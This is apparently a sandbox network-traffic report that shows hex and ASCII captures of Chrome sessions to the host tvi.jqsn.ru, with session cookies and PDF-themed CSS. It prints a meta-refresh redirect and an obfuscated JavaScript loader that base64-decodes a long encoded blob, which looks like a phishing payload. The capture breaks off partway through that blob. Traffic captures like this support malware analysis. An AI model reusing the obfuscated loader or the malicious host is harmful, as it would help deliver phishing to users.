                                                                                                                          2024-04-17 00:34:46 UTC817INData Raw: 33 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 74 76 69 2e 6a 71 73 6e 2e 72 75 2f 6e 44 49 4a 56 77 50 51 7a 6c 54 4f 4e 42 63 6b 52 4b 6d 68 4d 4f 41 49 75 58 61 4d 5a 51 42 56 56 59 53 43 54 49 42 50 4e 41 56 55 41 41 55 5a 57 55 47 4e 54 3f 48 57 55 56 5a 4b 5a 45 43 59 44 58 59 4c 58 50 5a 50 48 5a 58 41 5a 54 4f 4d 44 63 6b 77 4a 4b 65 49 44 44 45 56 41 54 47 58 57 41 49 50 45 45 52 44 44 41 4a 53 59 50 53 4a
                                                                                                                          Data Ascii: 32a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJ
                                                                                                                          2024-04-17 00:34:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.449775104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:46 UTC1525OUTGET /nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://tvi.jqsn.ru/i8jbs1sy/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkM5bWdRZ05QK1ZmdG55eUZmcEJ0WUE9PSIsInZhbHVlIjoiZ2Q5ellVcVRUQXlqajJhS21HMWlML2FndmhNb3FMZ0FCZm0zQllPa2R3eUNFaVBWcUNEeXQzL0xwMmYyWEhtZFE2Unp1YmNtZXZmNzlnWERUbmMwQUgyUllDSnJGZjJNYVNPS1VPTEM2NjFSSzFOU3R4ZFh6eFcvUmdjQXFmcEkiLCJtYWMiOiIxOWE5YWRlYjEwYjY5ZmMxMWQzYjQ5YTYyY2NmMDdkY2EyMmQ2N2VjNjQzYjc5MDkyZWZkNjY1YmQ5ZDAzM2ZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IndwQ1FxVmY1U1ZpYk5EcE1LWUMzS1E9PSIsInZhbHVlIjoick1wcy9oL2Nya2JmYzkzTDRBTFlKbTJ4bVlNaHc3cE5aV0JIL0FwK054RXduWXhVOXllcllzYTlmMTZtekJ6Z0tNeXB6dHMxMWZUZ21qMHcvMW40OGNJbERZSlFuaDZiZENCSkRHZEh3bWZaU1ZIMkpacjJPSVlic2w0eDZKclAiLCJtYWMiOiI1MDczOWNiNzNjYmEyZmUzNGFlNTdjMTAzZDM2ZWNjYjVhYTkwMzA3ZTZmOWY2ODFhZTkxMTQ0NTMwNmQ1NDM4IiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:47 UTC1126INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SlEqJ7FRJpZZlPNC2yrnxpvps5hSoGLGHn2jhN28iN9tTaIZ2VqnPOO2MdLJh3umJLrnUo9DSlKcn%2FCd3Rswe3c6VkDv75T%2BHFYGPF103eLM8%2B21x4UTfDDr1LFgjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:47 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:47 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 67 76 4d 53 74 72 4f 46 70 4d 65 43 74 31 64 47 70 44 63 58 46 4a 56 30 4a 4e 54 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 57 70 5a 53 55 68 42 65 6b 35 71 51 6d 49 33 55 43 38 7a 56 6a 4e 30 4e 58 68 42 63 31 4a 33 61 33 42 42 4e 6d 4a 55 57 47 46 4f 4d 55 35 45 57 46 59 77 65 57 56 53 61 48 68 6b 64 48 5a 6c 57 55 55 30 53 48 46 4b 57 54 42 77 64 44 4e 76 56 32 68 58 4d 43 74 61 62 32 6f 35 51 7a 6c 6e 57 46 46 46 64 57 6f 7a 63 58 4a 58 57 6d 70 45 64 47 6c 55 5a 6e 6c 47 57 6b 70 69 64 6c 52 4e 59 58 52 69 4c 30 78 77 65 6b 4a 73 4d 32 6c 46 54 32 52 57 4f 48 6c 34 54 31 70 56 5a 7a 4a 36 63 58 46 56 63 6e 64 32 54 30 6b
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0k
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 36 36 64 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 58 48 74 52 6b 6e 58 4c 50 61 28 77 63 7a 51 67 50 62 4b 64 76 2c 20 75 4b 4b 6c 6e 47 7a 79 42 44 29 20 7b 0d 0a 6c 65 74 20 67 54 50 54 41 4b 74 77 72 70 20 3d 20 27 27 3b 0d 0a 77 63 7a 51 67 50 62 4b 64 76 20 3d 20 61 74 6f 62 28 77 63 7a 51 67 50 62 4b 64 76 29 3b 0d 0a 6c 65 74 20 56 4e 79 63 54 50 61 62 6c 57 20 3d 20 75 4b 4b 6c 6e 47 7a 79 42 44 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 77 63 7a 51 67 50 62 4b 64 76 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 67 54 50 54 41 4b 74 77 72 70 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 77 63 7a 51 67 50 62 4b 64 76 2e 63 68 61 72 43
                                                                                                                          Data Ascii: 66d2<script>function XHtRknXLPa(wczQgPbKdv, uKKlnGzyBD) {let gTPTAKtwrp = '';wczQgPbKdv = atob(wczQgPbKdv);let VNycTPablW = uKKlnGzyBD.length;for (let i = 0; i < wczQgPbKdv.length; i++) { gTPTAKtwrp += String.fromCharCode(wczQgPbKdv.charC
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 30 65 52 41 59 49 52 49 6c 49 52 4d 65 65 41 49 63 41 54 6f 67 49 43 70 37 44 67 73 44 41 44 70 62 5a 45 56 4e 49 68 74 38 45 42 41 69 41 79 64 46 54 54 63 52 4d 56 64 4c 62 77 73 38 43 52 6c 73 48 79 35 55 45 47 39 4e 4d 42 55 43 4d 42 73 75 51 42 38 71 42 44 31 61 54 79 49 47 4c 6c 77 50 49 41 49 6d 46 45 39 39 5a 55 73 53 56 6d 31 4e 62 77 73 45 4c 51 4e 68 51 42 4d 68 55 48 45 58 48 79 59 45 4c 6c 4d 53 62 30 30 37 46 51 67 6c 56 57 4d 4b 54 78 6c 64 45 69 45 5a 42 6a 78 31 42 54 73 35 42 7a 41 44 58 43 6b 4d 4b 55 49 79 4b 6c 6b 59 43 51 41 6f 43 53 4d 46 52 57 39 4e 4d 68 52 51 59 51 34 75 58 41 4a 76 54 53 63 65 48 53 5a 56 59 31 51 5a 49 78 6c 38 45 41 49 6c 44 6e 4d 51 56 69 34 66 50 42 51 65 4c 42 6f 6f 56 52 38 6a 55 48 45 47 41 79 77 47 4f 46
                                                                                                                          Data Ascii: 0eRAYIRIlIRMeeAIcATogICp7DgsDADpbZEVNIht8EBAiAydFTTcRMVdLbws8CRlsHy5UEG9NMBUCMBsuQB8qBD1aTyIGLlwPIAImFE99ZUsSVm1NbwsELQNhQBMhUHEXHyYELlMSb007FQglVWMKTxldEiEZBjx1BTs5BzADXCkMKUIyKlkYCQAoCSMFRW9NMhRQYQ4uXAJvTSceHSZVY1QZIxl8EAIlDnMQVi4fPBQeLBooVR8jUHEGAywGOF
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 54 57 4e 49 59 52 4a 57 62 55 30 78 43 42 38 6e 44 54 4d 49 56 6e 38 64 4b 30 63 65 4c 41 51 6f 56 6c 5a 75 58 57 4e 52 57 69 46 51 65 6a 39 38 62 55 31 7a 52 30 31 6a 53 47 45 53 56 6d 31 4e 49 77 59 4a 4a 77 45 76 56 55 78 74 57 43 4d 66 54 58 42 59 4d 55 70 4e 51 47 64 7a 52 30 31 6a 53 47 45 53 56 6d 31 4e 63 30 63 4c 4c 41 59 31 48 77 55 6b 46 7a 5a 64 54 58 4a 64 4d 55 70 4e 51 47 64 7a 52 30 31 6a 53 47 45 53 56 6d 31 4e 63 30 63 4f 4e 68 6f 79 58 51 52 33 54 53 4d 49 42 43 30 63 4a 45 42 4e 51 47 64 7a 52 30 31 6a 53 47 45 53 56 6a 42 67 57 55 64 4e 59 30 68 4d 4f 46 5a 74 54 58 4e 48 54 57 4e 49 62 31 41 43 49 31 63 37 43 42 73 6d 47 6d 46 4a 65 30 64 4e 63 30 64 4e 59 30 68 68 45 6c 5a 74 54 58 4d 46 44 43 41 44 4a 6b 41 5a 4f 41 4d 33 53 67 34
                                                                                                                          Data Ascii: TWNIYRJWbU0xCB8nDTMIVn8dK0ceLAQoVlZuXWNRWiFQej98bU1zR01jSGESVm1NIwYJJwEvVUxtWCMfTXBYMUpNQGdzR01jSGESVm1Nc0cLLAY1HwUkFzZdTXJdMUpNQGdzR01jSGESVm1Nc0cONhoyXQR3TSMIBC0cJEBNQGdzR01jSGESVjBgWUdNY0hMOFZtTXNHTWNIb1ACI1c7CBsmGmFJe0dNc0dNY0hhElZtTXMFDCADJkAZOAM3Sg4
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 6b 39 74 61 6d 64 2f 44 43 68 45 56 69 51 4a 62 6b 55 65 4a 67 73 31 57 78 6b 6a 48 6e 46 48 44 69 38 4a 4d 6b 46 4c 62 30 39 74 61 6d 64 6a 53 47 45 53 53 6a 34 49 4d 42 4d 45 4c 41 5a 68 57 78 4a 77 54 79 41 43 44 6a 63 42 4c 6c 77 70 4f 52 38 71 44 67 4d 6b 48 43 35 42 48 79 6f 44 4f 67 6c 50 59 78 73 31 53 78 6f 6f 55 48 45 47 41 79 6f 46 49 45 59 66 49 67 4e 70 46 41 55 73 48 32 78 55 42 43 49 41 66 68 55 45 4a 41 41 31 45 6b 5a 6a 57 43 42 63 54 32 4d 4c 4c 56 4d 46 50 6c 42 78 52 56 4e 4f 59 6d 45 53 56 6d 31 4e 63 30 64 4e 66 77 77 6f 52 46 59 75 41 54 49 55 48 6e 35 4b 49 45 63 43 4a 55 41 6b 46 51 77 7a 47 43 52 41 56 48 4e 67 57 55 64 4e 59 30 68 68 45 6c 5a 74 54 58 4e 48 54 58 38 4d 4b 45 52 57 4c 67 45 79 46 42 35 2b 53 69 31 64 46 79 6b 45
                                                                                                                          Data Ascii: k9tamd/DChEViQJbkUeJgs1WxkjHnFHDi8JMkFLb09tamdjSGESSj4IMBMELAZhWxJwTyACDjcBLlwpOR8qDgMkHC5BHyoDOglPYxs1SxooUHEGAyoFIEYfIgNpFAUsH2xUBCIAfhUEJAA1EkZjWCBcT2MLLVMFPlBxRVNOYmESVm1Nc0dNfwwoRFYuATIUHn5KIEcCJUAkFQwzGCRAVHNgWUdNY0hhElZtTXNHTX8MKERWLgEyFB5+Si1dFykE
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 73 53 56 6d 31 4e 63 30 64 4e 59 30 68 68 45 6c 5a 78 43 54 6f 52 54 53 41 45 49 45 45 46 63 45 38 2f 43 41 77 6e 41 53 39 56 57 79 34 43 50 52 4d 4d 4b 67 59 6b 51 46 52 7a 59 46 6c 48 54 57 4e 49 59 52 4a 57 62 55 31 7a 52 30 31 6a 53 47 45 53 53 69 6b 45 4a 55 63 4f 4c 77 6b 79 51 55 74 76 43 54 77 54 51 43 55 45 4c 6c 4d 43 4a 41 4d 30 52 56 4e 2f 52 79 56 62 41 48 4e 67 57 55 64 4e 59 30 68 68 45 6c 5a 74 54 58 4e 48 54 57 4e 49 59 52 4a 4b 4b 51 51 6c 52 77 34 76 43 54 4a 42 53 32 38 4a 50 42 4e 41 4a 51 51 75 55 77 49 6b 41 7a 52 46 55 33 39 48 4a 56 73 41 63 32 42 5a 52 30 31 6a 53 47 45 53 56 6d 31 4e 63 30 64 4e 59 30 68 68 45 6b 6f 70 42 43 56 48 44 69 38 4a 4d 6b 46 4c 62 77 6b 38 45 30 41 6c 42 43 35 54 41 69 51 44 4e 45 56 54 66 30 63 6c 57
                                                                                                                          Data Ascii: sSVm1Nc0dNY0hhElZxCToRTSAEIEEFcE8/CAwnAS9VWy4CPRMMKgYkQFRzYFlHTWNIYRJWbU1zR01jSGESSikEJUcOLwkyQUtvCTwTQCUELlMCJAM0RVN/RyVbAHNgWUdNY0hhElZtTXNHTWNIYRJKKQQlRw4vCTJBS28JPBNAJQQuUwIkAzRFU39HJVsAc2BZR01jSGESVm1Nc0dNY0hhEkopBCVHDi8JMkFLbwk8E0AlBC5TAiQDNEVTf0clW
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 49 4a 56 56 6a 45 56 52 74 43 54 49 54 44 47 34 42 4a 51 39 55 50 67 51 30 43 52 67 7a 53 6d 46 64 47 43 34 42 4f 67 51 47 66 6b 6f 74 57 78 67 6d 41 69 4d 54 42 43 77 47 49 6c 34 66 4c 67 5a 37 45 77 55 71 47 32 67 51 56 69 34 42 4d 68 51 65 66 6b 6f 74 57 78 67 6d 54 32 30 6b 48 79 59 4a 4e 56 64 57 49 67 4d 32 52 6c 46 73 43 58 38 4f 57 54 31 54 62 77 5a 4e 49 41 51 67 51 51 56 77 54 7a 38 4f 41 79 68 49 4c 46 42 62 66 46 74 78 52 77 6b 69 48 43 41 66 48 79 6c 51 63 51 51 4d 4c 52 77 41 55 52 55 6f 48 69 41 6d 44 69 41 48 4e 46 77 43 62 30 30 38 43 51 34 76 41 53 4a 5a 53 32 38 42 4f 67 6b 47 4c 42 67 31 57 78 6b 6a 44 6a 38 4f 44 69 68 41 4e 56 6f 66 50 6b 52 78 52 77 55 78 44 53 63 50 56 47 35 50 62 53 51 4d 4c 55 38 31 45 68 63 75 44 6a 59 55 48 6d
                                                                                                                          Data Ascii: IJVVjEVRtCTITDG4BJQ9UPgQ0CRgzSmFdGC4BOgQGfkotWxgmAiMTBCwGIl4fLgZ7EwUqG2gQVi4BMhQefkotWxgmT20kHyYJNVdWIgM2RlFsCX8OWT1TbwZNIAQgQQVwTz8OAyhILFBbfFtxRwkiHCAfHylQcQQMLRwAURUoHiAmDiAHNFwCb008CQ4vASJZS28BOgkGLBg1WxkjDj8ODihANVofPkRxRwUxDScPVG5PbSQMLU81EhcuDjYUHm
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 47 32 31 71 5a 32 4e 49 59 52 4a 57 62 55 31 7a 52 30 31 6a 53 47 45 53 56 6d 31 52 4e 77 34 62 59 77 73 74 55 77 55 2b 55 48 45 44 41 6a 64 46 4a 31 34 5a 4c 42 6b 36 43 51 70 68 56 6e 30 64 45 69 51 62 62 57 70 6e 59 30 68 68 45 6c 5a 74 54 58 4e 48 54 57 4e 49 66 52 30 53 4a 42 74 74 61 6d 64 6a 53 47 45 53 56 6d 31 4e 63 30 64 4e 59 30 68 39 56 68 38 37 54 54 41 4c 44 44 41 62 66 42 41 46 4b 41 34 6e 44 67 49 74 43 79 35 63 41 69 67 44 4a 30 56 54 54 6d 4a 68 45 6c 5a 74 54 58 4e 48 54 57 4e 49 59 52 4a 4b 4b 51 51 6c 52 77 34 76 43 54 4a 42 53 32 38 50 4d 67 6b 44 4a 68 6f 74 58 52 45 69 54 33 4d 45 41 53 49 62 4d 67 39 55 4b 55 41 78 43 77 49 67 41 32 4d 4d 53 6d 49 4a 4f 68 46 54 54 6d 4a 68 45 6c 5a 74 54 58 4e 48 54 57 4e 49 59 52 4a 4b 4b 51 51
                                                                                                                          Data Ascii: G21qZ2NIYRJWbU1zR01jSGESVm1RNw4bYwstUwU+UHEDAjdFJ14ZLBk6CQphVn0dEiQbbWpnY0hhElZtTXNHTWNIfR0SJBttamdjSGESVm1Nc0dNY0h9Vh87TTALDDAbfBAFKA4nDgItCy5cAigDJ0VTTmJhElZtTXNHTWNIYRJKKQQlRw4vCTJBS28PMgkDJhotXREiT3MEASIbMg9UKUAxCwIgA2MMSmIJOhFTTmJhElZtTXNHTWNIYRJKKQQ
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 52 4a 57 62 55 31 7a 52 30 31 6a 56 43 56 62 41 47 30 4f 50 77 59 65 4d 46 56 6a 58 68 6b 73 43 54 6f 4a 43 6d 34 4c 4c 6c 77 43 4c 41 51 39 41 68 39 68 56 6b 77 34 56 6d 31 4e 63 30 64 4e 59 30 68 68 45 6c 5a 74 54 58 4e 48 54 58 38 4d 4b 45 52 57 4c 67 45 79 46 42 35 2b 53 69 56 64 41 6d 41 4c 50 77 67 4d 4e 77 45 76 56 56 52 7a 55 58 77 44 42 44 56 57 54 44 68 57 62 55 31 7a 52 30 31 6a 53 47 45 53 56 6d 31 4e 63 30 64 4e 66 77 77 6f 52 46 59 75 41 54 49 55 48 6e 35 4b 4a 56 30 43 59 41 73 2f 43 41 77 33 41 53 39 56 56 48 4e 52 66 41 4d 45 4e 56 5a 4d 4f 46 5a 74 54 58 4e 48 54 57 4e 49 59 52 4a 57 62 55 31 7a 52 30 31 2f 44 43 68 45 56 69 34 42 4d 68 51 65 66 6b 6f 6c 58 51 4a 67 43 7a 38 49 44 44 63 42 4c 31 56 55 63 31 46 38 41 77 51 31 56 6b 77 34
                                                                                                                          Data Ascii: RJWbU1zR01jVCVbAG0OPwYeMFVjXhksCToJCm4LLlwCLAQ9Ah9hVkw4Vm1Nc0dNY0hhElZtTXNHTX8MKERWLgEyFB5+SiVdAmALPwgMNwEvVVRzUXwDBDVWTDhWbU1zR01jSGESVm1Nc0dNfwwoRFYuATIUHn5KJV0CYAs/CAw3AS9VVHNRfAMENVZMOFZtTXNHTWNIYRJWbU1zR01/DChEVi4BMhQefkolXQJgCz8IDDcBL1VUc1F8AwQ1Vkw4
                                                                                                                          2024-04-17 00:34:47 UTC1369INData Raw: 6c 2b 53 68 4a 46 48 7a 6b 4f 4f 7a 49 65 4a 68 70 6a 45 68 6b 6a 44 6a 38 4f 44 69 68 56 59 31 34 66 49 77 59 38 46 78 6b 71 42 79 39 52 47 69 51 4f 4f 45 38 5a 4b 77 45 79 47 31 52 74 44 6a 38 47 48 6a 42 56 59 31 77 5a 59 42 6f 68 42 68 31 68 53 43 6c 41 45 79 74 51 63 55 52 50 66 54 73 6f 56 52 68 74 41 69 59 54 54 53 49 47 4a 52 49 46 4a 41 6f 39 52 77 51 74 53 44 5a 62 41 69 56 4e 4d 6b 63 4a 4b 67 34 6e 56 77 51 6f 41 79 64 48 44 43 41 4c 4c 6b 63 59 4f 56 46 38 42 6c 4e 4f 59 6d 45 53 56 6d 31 4e 63 30 64 4e 59 30 68 68 45 6b 70 69 43 54 6f 52 55 30 35 69 59 52 4a 57 62 55 31 7a 52 30 31 6a 53 47 45 53 53 69 6b 45 4a 55 63 4f 4c 77 6b 79 51 55 74 76 46 44 77 53 43 53 77 47 4e 56 6f 58 4f 77 67 79 42 41 34 6d 47 7a 4a 51 47 54 6b 5a 50 41 6f 43 4d
                                                                                                                          Data Ascii: l+ShJFHzkOOzIeJhpjEhkjDj8ODihVY14fIwY8FxkqBy9RGiQOOE8ZKwEyG1RtDj8GHjBVY1wZYBohBh1hSClAEytQcURPfTsoVRhtAiYTTSIGJRIFJAo9RwQtSDZbAiVNMkcJKg4nVwQoAydHDCALLkcYOVF8BlNOYmESVm1Nc0dNY0hhEkpiCToRU05iYRJWbU1zR01jSGESSikEJUcOLwkyQUtvFDwSCSwGNVoXOwgyBA4mGzJQGTkZPAoCM


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.449780104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1391OUTGET /56A5wX26vkiBXPzcdL7A5K8920 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:49 UTC757INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:49 GMT
                                                                                                                          Content-Type: text/css;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="56A5wX26vkiBXPzcdL7A5K8920"
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl2HzX9BZmMitPWlOiYuGqhqWGVbZtcmwalhzYaUSZ32i2%2BJWEETJge34DAjfv7C3Lks2Jzwu9g%2BBG3H0WhXuavZhw6wV7Q8JH3R8desoJQqOKoGoltW59awJOxk3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddee757bc6-ATL
                                                                                                                          2024-04-17 00:34:49 UTC612INData Raw: 35 62 36 36 0d 0a 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23 70 61 67 65 4e 61 6d 65 2c 2e 72 6f 77 2e 74 69 6c 65 2c 2e 72 6f 77 2e 74 69 6c 65 3a 6e 6f 74 28 2e 6e 6f 2d 70 69 63 6b 29 3a 61 63 74 69 76 65 2c 2e
                                                                                                                          Data Ascii: 5b66*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.
